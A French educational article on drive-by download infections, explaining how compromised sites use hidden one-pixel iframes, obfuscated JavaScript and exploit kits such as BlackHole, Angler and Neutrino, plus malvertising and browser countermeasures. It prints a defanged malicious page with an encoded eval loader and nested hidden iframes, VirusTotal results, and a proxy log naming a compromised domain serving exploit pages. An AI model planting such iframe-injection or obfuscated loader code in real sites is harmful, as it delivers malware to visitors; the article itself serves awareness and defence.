Vous pouvez aussi lire cet article plus récent :des attaques Drive-By Download.
Les exploits permettant l'installation d'une infection de manière automatique et à l'insu de l'utilisateur lors de la visite d'un site WEB.
L'exploit tire partie de vulnérabilités sur les logiciels installés sur l'ordinateur. Pour fonctionner donc, il faut que des logiciels non à jour et ayant des vulnérabilités soit présents sur l'ordinateur. En général, ce sont les plugins du navigateurs WEB qui sont visés notamment Java ou Adobe Reader/Flash.
Vous trouverez un exemple sur l'article Attention aux sites de cracks!
Nous allons voir le principe des infections via des exploits sur des sites WEB.
Pour bien comprendre ce qu'est une vulnérabilité, reportez-vous au dossier : Les vulnérabilités
! | La connaissance de certaines notions et expressions est nécessaire pour appréhender cet article... Reportez-vous au Glossaire : Notions et Expressions pour suivre cet article. |
Une vidéo plus ancienne avec un exploit Web tirant parti d'un plugin Java non à jour :
et cette vidéo pédagogique :
La théorie
Pour infecter votre ordinateur, l'auteur du malware doit réussir à exécuter sur votre ordinateur le fichier à l'origine de l'infection sans que les logiciels de protections ne le détectent/interceptent.
Une fois l'infection installée, votre antivirus peut détecter certains fichiers composant l'infection mais en règle générale, ce dernier n'arrive pas à détecter la totalité ou supprimer l'infection en entier surtout quand l'infection est composée de rootkits
La première difficulté pour installer une infection est donc de faire exécuter le fichier à l'origine de l'infection sur le système ciblé.
C'est à ce moment précis que les exploits vont être utilisés.
En visitant une page Web piégée, celle-ci va exploiter une faille de sécurité de votre navigateur WEB, système ou logiciels tiers afin de télécharger et exécuter à votre insu le fichier à l'origine de l'infection (illustration voir les pages IE6 VS IE 7 : Pourquoi maintenir son navigateur à jour ? et Dropper & Payload : Explications).
Pour fonctionner une faille doit être présente sur le système (Windows), ou logiciels installés sur votre ordinateur, c'est pour cela qu'il est important de maintenir son système ainsi que l'ensemble de ces logiciels à jour.
Les auteurs des malwares / virus pirate en permanence une multitude de sites WEB, si possible sur des thèmes suceptibles d'amener un maximum de personnes, donc par exemple des sites de cracks ou pornographiques. Ces sites WEB contiennent alors une iframe de 1 pixel de large pointant vers un ou plusieurs sites WEB contenant les exploits et le fichier à l'origine de l'infection.
L'iframe étant un cadre contenant une page html qui va être automatiquement exécutée par le navigateur, la taille de 1 pixel permet de cacher celle-ci de l'internaute au moment de consulter la page WEB.
L'iframe va alors rediriger l'internaute à son insu sur le site contenant l'exploit puis permettre le téléchargement et l'exécution du fichier à l'origine de l'infection au sein du système.
Voici un résumé via un schéma (cliquez sur l'image pour l'agrandir) :
Lors de la visite de la page piégée, votre antivirus peut alors détecter l'exploit, généralement Exploit.ADODB.Stream.xxx ou JS/Psyme.xxx
En pratique :
Voici un exemple de code d'une page WEB piégée. Toutes les adresses ont été masquées.
En rouge nous pouvons visualiser l'iframe qui permet une redirection vers l'adresse en src=<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><base target="_blank">
<head>
<meta http-equiv="content-type" content="text/htxml;charset=iso-8859-1">
<title>xxxxxx xxxx</title>
<SxCRIPT language=JavaScript>
<!--
document.cookie = 'trafman=traf-0.805.1181008106.1.0.805.; path=/;;';
// -->
</SCRIPT>
</head>
<body bgcolor="#464646" leftmargin="0" marginheight="0" marginwidth="0" topmargin="0" bottommargin="0">
<scrxipt type='text/javascript'>eval(String.fromCxharCode(100,111,99,117,120,101,110,116,46,120,114,105,116,101,40,39,60,105,12,114........,114,97,109,101,62,39,41)
</xscript>
<iframe src="http://xxxxxxxxxxxx.com/ts/in.cgi?pcc3" width="1" height="1"></iframe>
Les attributs width="1" height="1" donne une taille de 1 pixel sur 1 pixel à l'iframe.
Celle-ci est donc invisible pour l'utilisateur.
En bleu, nous avons un script offusqué. Ce dernier nous donne :
Code : Tout sélectionner
document.write('<iframe style="display:none" src="http://xx.xxx.xxx.xx/data/title.html" width=0 height=0></iframe>')
Le fichier title.html de la première iframe en bleu contient :
Code : Tout sélectionner
<HTMx>
<HEAD>
</HEAD>
<BODY>
<iframx src="http://xx.xxx.xxx.xx/data/do_z.html" width="1" height="1"><iframe src="http://xx.xxx.xxx.xx/data/if_z.html" width="1" height="1"></iframe><iframe src="nie_z.html" width="1" height="1"></iframe>
</BODY>
</HTML>
enfin un scan des fichiers do_z.html & if_z.html nous donne :
Complete scanning result of "do_z.html", received in VirusTotal at 06.03.2007, 10:17:22 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.5.31.2 06.01.2007 no virus found
AntiVir 7.4.0.29 06.01.2007 JS/Psyme.SE.3
Authentium 4.93.8 05.23.2007 JS/Psyme.CA@dl
Avast 4.7.997.0 06.01.2007 no virus found
AVG 7.5.0.467 06.02.2007 no virus found
BitDefender 7.2 06.03.2007 Exploit.ADODB.Stream.FD
CAT-QuickHeal 9.00 06.02.2007 no virus found
ClamAV devel-20070416 06.03.2007 no virus found
DrWeb 4.33 06.02.2007 no virus found
eSafe 7.0.15.0 05.31.2007 no virus found
eTrust-Vet 30.7.3688 06.03.2007 no virus found
Ewido 4.0 06.02.2007 no virus found
FileAdvisor 1 06.03.2007 no virus found
Fortinet 2.85.0.0 06.02.2007 no virus found
F-Prot 4.3.2.48 06.01.2007 JS/Psyme.CA@dl
F-Secure 6.70.13030.0 06.02.2007 JS/Psyme.CA@dl
Ikarus T3.1.1.8 06.03.2007 no virus found
Kaspersky 4.0.2.24 06.03.2007 no virus found
McAfee 5044 06.01.2007 no virus found
Microsoft 1.2503 06.03.2007 no virus found
NOD32v2 2305 06.01.2007 no virus found
Norman 5.80.02 06.01.2007 no virus found
Panda 9.0.0.4 06.02.2007 no virus found
Prevx1 V2 06.03.2007 no virus found
Sophos 4.18.0 06.01.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 06.03.2007 no virus found
TheHacker 6.1.6.128 05.31.2007 no virus found
VBA32 3.12.0 06.02.2007 no virus found
VirusBuster 4.3.23:9 06.02.2007 no virus found
Webwasher-Gateway 6.0.1 06.03.2007 Script.Psyme.SE.3
Aditional Information
File size: 3405 bytes
MD5: 18d6ee8bea0e60a073486af1aac08e06
SHA1: 0b66f4915e66a9adc0f275648283ed7a9789831b
Ce sont donc deux exploits qui vont permettre le téléchargement et l'execution fichiers à l'origine de l'infection à l'insu de l'internaute.Complete scanning result of "if_z.html", received in VirusTotal at 06.03.2007, 10:17:27 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.5.31.2 06.01.2007 no virus found
AntiVir 7.4.0.29 06.01.2007 JS/Psyme.SE.4
Authentium 4.93.8 05.23.2007 JS/Mht.BB@expl
Avast 4.7.997.0 06.01.2007 no virus found
AVG 7.5.0.467 06.02.2007 no virus found
BitDefender 7.2 06.03.2007 Exploit.ADODB.Stream.FD
CAT-QuickHeal 9.00 06.02.2007 no virus found
ClamAV devel-20070416 06.03.2007 no virus found
DrWeb 4.33 06.02.2007 no virus found
eSafe 7.0.15.0 05.31.2007 no virus found
eTrust-Vet 30.7.3688 06.03.2007 no virus found
Ewido 4.0 06.02.2007 no virus found
FileAdvisor 1 06.03.2007 no virus found
Fortinet 2.85.0.0 06.02.2007 no virus found
F-Prot 4.3.2.48 06.01.2007 JS/Mht.BB@expl
F-Secure 6.70.13030.0 06.02.2007 JS/Mht.BB@expl
Ikarus T3.1.1.8 06.03.2007 no virus found
Kaspersky 4.0.2.24 06.03.2007 no virus found
McAfee 5044 06.01.2007 no virus found
Microsoft 1.2503 06.03.2007 no virus found
NOD32v2 2305 06.01.2007 no virus found
Norman 5.80.02 06.01.2007 no virus found
Panda 9.0.0.4 06.02.2007 no virus found
Prevx1 V2 06.03.2007 no virus found
Sophos 4.18.0 06.01.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 06.03.2007 no virus found
TheHacker 6.1.6.128 05.31.2007 no virus found
VBA32 3.12.0 06.02.2007 no virus found
VirusBuster 4.3.23:9 06.02.2007 no virus found
Webwasher-Gateway 6.0.1 06.03.2007 Script.Psyme.SE.4
Aditional Information
File size: 2321 bytes
MD5: 9b5e23a1f45a9b3a1e9bfa32c4d4a51e
SHA1: a2e181ed072a0e0aae6cf832d1b8bd6c56859756
Pour résumer : le site WEB piégé contient deux iframes invisibles à l'utilisateur. Au moment de consulter la page, le navigateur va se connecter au site WEB contenu dans les iframes et ceci de manière automatique.
La première iframe va lancer deux exploits sur le navigateur WEB qui vont exploiter une faille de sécurité sur le navigateur afin de permettre le téléchargement et l'execution des fichiers à l'origine de l'infection à l'insu de l'internaute.
Si l'on reprend cette page : http-www-golfinau-com-stat-flash-swf-t15582.html
On a les pages suivantes contenant des exploits :
Code : Tout sélectionner
1227990727.782 54 192.168.1.120 TCP_MISS/200 893 GET http://www.golfinau.com/stat/Flash.htm - DIRECT/85.17.212.137 text/html
1227990728.103 63 192.168.1.120 TCP_MISS/200 1934 GET http://www.golfinau.com/stat/
Ms06014.htm - DIRECT/85.17.212.137 text/html
1227990728.157 104 192.168.1.120 TCP_MISS/200 1743 GET http://www.golfinau.com/stat/Opera.htm - DIRECT/85.17.212.137 text/html
1227990728.161 106 192.168.1.120 TCP_MISS/200 1948 GET http://www.golfinau.com/stat/Ms08053.htm - DIRECT/85.17.212.137 text/html
1227990728.192 55 192.168.1.120 TCP_MISS/200 2986 GET http://www.golfinau.com/stat/Ms07055.htm - DIRECT/85.17.212.137 text/html
1227990728.787 55 192.168.1.120 TCP_MISS/200 2694 GET http://www.golfinau.com/stat/Djvu.htm - DIRECT/85.17.212.137 text/html
- Faille Flash Player
- Faille Opera 6.2
- MS-0614 Faille MDac de 2006
- MS08-053 Faille Windows Media 9
- MS07-055 faille dans Kodak Image Viewer
- ActiveX DjVu pour MS Office
Le but étant pour les auteurs de malwares / virus d'augmenter les chances d'infection en tentant d'attaquer un maximum de logiciels différents puisque les chances qu'un logiciel non à jour sur le système visé soit présent sont fortes.
Voici une page qui donne plus d'informations sur l'utilisation de Javascript pour rediriger les internautes vers des ExploitKits : https://www.malekal.com/piratagehack-site-web-et-javascript-malicieux/
Ces Javascript peuvent être détectés de plusieurs manières par les antivirus, comme Trojan.JS, Trojan.Downloader.JS ou encore JS/Redir.
Vous trouverez une autre description encore plus détaillée sur le comparatif des antivirus gratuits 2010 dans la partie du Test de blockage des URL malicieuses : comparatif-antivirus-gratuits-2010-t23535.html#p196483
Il faut donc bien comprendre qu'il est important de maintenir son système et ses logiciels à jour, la simple présence d'un logiciel non à jour suffit pour infecter votre ordinateur. Je repète, c'est la simple présence du logiciel non à jour qui met votre système en danger, logiciel utilisé ou non genre rien, d'ailleurs dans le cas d'un logiciel non utilisé, il vaut mieux le désinstalle, vous gagnez en sécurité car vous risquez d'oublier de le mettre à jour.
Pour maintenir son système à jour, faites un Scan de vulnérabilités
Vulnérabilités 0-Day
Une vulnérabilité 0-day est une vulnérabilité publiée non corrigée, aucune correctif n'est disponible.
Si celle-ci est incorporée dans un web exploitkit, les ordinateurs des internautes peuvent donc être en danger.
Le délai de mise en ligne d'un correctif peut aller d'une journée à plusieurs jours selon l'éditeur.
Vous l'aurez compris, le but est d'intégré le plus vite possible ces vulnérabilités avant que l'éditeur met en ligne un correctif et que les internautes l'installent afin d'infecter le maximum d'ordinateur.
Cela montre aussi encore une fois, l'importance de maintenir ses programmes à jour.
La FAQ suivante peut vous y aider : Logiciels pour maintenir ses programmes à jour
Quelques exemples de 0-Day :
Cela est arrivé plusieurs fois avec Java et Flash par exemple avec la vulnérabilité Exploit.Java.CVE-2012-4681.
En Juillet 2015, deux 0-day ont été publiées à la suite sur Flash et Java : http://forum.malekal.com/day-flash-java ... ml#p401199
Des contre-mesures sont possibles comme NoScript qui permet de filtrer l'utilisation de plugins tiers selon une liste blanche.
Noscript en vidéo :
Côté vulnérabilités, Java, Flash, SilverLight sont les plugins les plus touchés :
Les vulnérabilités Adobe Flash par année (source https://labsblog.f-secure.com/2016/05/2 ... data-pr0n/ ).
Distribution : Malvertising (publicités malicieuses)
Vous pouvez vous reporter au dossier : Publicités malicieuses : « Malvertising »
De nombreux sites se font hacker afin que lorsque l'internaute visite ce site, les exploits se lancent et si elles y parviennent infecte son ordinateur.
Seulement, hacker des sites à forte audience n'est pas forcément facile et surtout cela peux être corrigé rapidement, le nombre d'internaute infecte peux augmenter sensiblement mais sera très court.
Une autre approche consiste à utiliser des bannières malicieuse et à les vendre à des regies de pubs.
Ces bannières lorsqu'elles seront affichés vont conduire aux exploits.
Le gros avantage est qu'en plus, on peux viser des thématiques particulièrement de sites.
C'est notamment ce qui arrive depuis fin 2011 où des sites de streaming et de téléchargements illégaux ont été visés par des malvertising afin de faire installer des ransomwares Fake Police.
Ceci a permis d'infecter un nombre assez conséquent d'internautes puisque ces sites ont une forte audience sur une longue durée (plusieurs semaines).
Une des malvertising touchée le site videobb via la régie adserve, videobb un site qui permettait de visualiser des films de streaming comme megaupload. Ceci a permis de toucher beaucoup d'internautes.
Des malvertising ont aussi été distribuées à la régie de publicité clicksor qui est très répandue et notamment présente sur Piratebay : https://www.malekal.com/?s=clicksor
Par la suite, des sites pornographiques ont été visés :
- pornerbros.com conduit à des infections via des exploits
- Malvertising : delivery.trafficbroker.com délivre ransomware « Activite illicite demelée »
- Malvertising @ juicyads.com : Ransomware Activite illicite demelée
- Trafficholder Malvertising, Exploit Kit, Trojan et Ransomware
- Malvertising Uptobox poussant Cerber
Pour d'autres exemples, suivre le tag Malvertising : https://www.malekal.com/tag/malvertising/
Voici une vidéo où on voit une malvertising qui lors de son affichage lance une infection de type Zbot :
ou sur Piratebay :
Contre-mesures sur les navigateurs WEB
Devant l'émergence de ses menaces, depuis 2008, les navigateurs WEB ajoutent des contre-mesures afin de protéger les internautes.
Firefox vous notifie lorsque des plugins ne sont pas à jour :
Certaines extensions peuvent être automatiquement désactivées.
La page suivante permet de tester ses plugins et vérifier s'ils posent des problèmes de sécurité : https://www.mozilla.org/fr/plugincheck/
Google Chrome vous notifie lorsqu'une applet Java souhaite se lancer, vous devez donc vous-même lancer son exécution.
Cela permet d’empêcher l’exécution automatique de plugins depuis les navigateurs WEB.
Depuis Windows Vista, une nouvelle fonctionnalité pour les navigateurs permet de les faire tourner dans une sandbox - "bac à sable".
Le but est de faire tourner le navigateur WEB dans un environnement fermé qui est dissocié du système. Dès lors, si un malware se lance, il ne pourra pas atteindre le système et l'infecter.
Si vous utilisez Internet Explorer, il convient de désactiver les javascript dans Adobe Reader et de désactiver Java.
(Les pages plus bas pour sécuriser vos navigateurs WEB vous expliquent comment faire).
Business autour des Web Malware Exploitation Kit
Des Web Malware exploitation Kit sont en vente avec différents noms MPack, El-Fiesta etc.. , le Web Malware exploitation Kit est donc un pack qui propose différents exploits et interface WEB de gestion du kit, statistiques etc.
Présentation du BlackHole Exploit WebKit :
Voici un exemple de la page de statistiques du Web Malware Exploitation Kit El-Fiesta.
On y e trouve les statistiques d'infection par pays, navigateur WEB, version de Windows etc.
BlackHole a été stoppé après l'arrestation de son autour fin 2013 et remplacer par un autre ExploitKit tout aussi sophistiqué : Angler EK.
Les statistiques sont plus ou moins détaillées selon le Web Malware Exploitation Kit El-Fiesta
ou encore Rig Exploit Kit :
Un groupe peut alors acheter ce Web Malware Exploitation Kit, acheter différents trojans et ne s'occuper que la diffusion de leurs infections afin de se constituer un réseau de botnet et le louer pour des campagnes de SPAM etc.
Vous l'aurez compris, il existe tout un éco-système autour des malwares / virus, la concurrence entre les différents kits font que ces derniers doivent être performants (afin de vendre +), dès lors ils intègrent très rapidement les dernières vulnérabilités découvertes sur vos logiciels.
Les Web Exploit Kit du les plus virulents ; 2015/2016 :
2015 a vu une chute des Web Exploits, les navigateurs WEB ayant pris de plus en plus de mesures de sécurité et des arrestations ont fortement perturbé ce vecteur d'infection.
Le WebExploit Kit Angler, un des plus virulent et perfectionné, avait été stoppé mais Neutrino EK avait pris la relève.
Une étude de Microsoft sur les Web Exploit en 2016 : Exploit kits remain a cybercrime staple against outdated software – 2016 threat landscape review series.
Neutrino EK reste le plus actif
Les pays les plus touchés, la France se place 5e :
En Conclusion :
Les auteurs de malwares / virus piratent des sites WEB afin de diffuser leurs infections.
Un simple programme permet aux auteurs de malwares / virus de mettre à jour leurs centaines de sites pour faire pointer vers de nouveaux exploits qui vont exploiter les dernières failles de sécurité de vos logiciels ou tout simplement lorsque le fichier à l'origine de l'infection est trop bien détecté par les antivirus.
Pour ne pas vous faire infecter par ces exploits, maintenez votre système à jour, bannissez les versions obselètes des navigateurs WEB et utilisez un navigateur alternatif que vous sécurisez, (voir Sécuriser son ordinateur version courte).
Pensez aussi à maintenir à jour vos logiciels tiers et notamment les plugins de votre navigateur WEB, je vous conseille vivement de lire la page : Infections : exploitation SWF/PDF et Java qui montre que les plugins des navigateurs WEB sont des portes d'entrée.
En ce qui concerne les malvertising, en plus de maintenir ses logiciels à jour, il est possible de filtrer les publicités notamment via l'extension adblock pour Firefox ( voir la page Sécuriser Firefox.
Pour aller plus loin :
Pourquoi et comment je me fais infecter?
Sécuriser ses navigateurs : Plus globalement, vous pouvez lire la page Sécuriser son ordinateur et connaître les menaces qui vous liste les moyens de propagation et menaces sur internet et vous donne des conseils pour sécuriser votre ordinateur.
Les liens :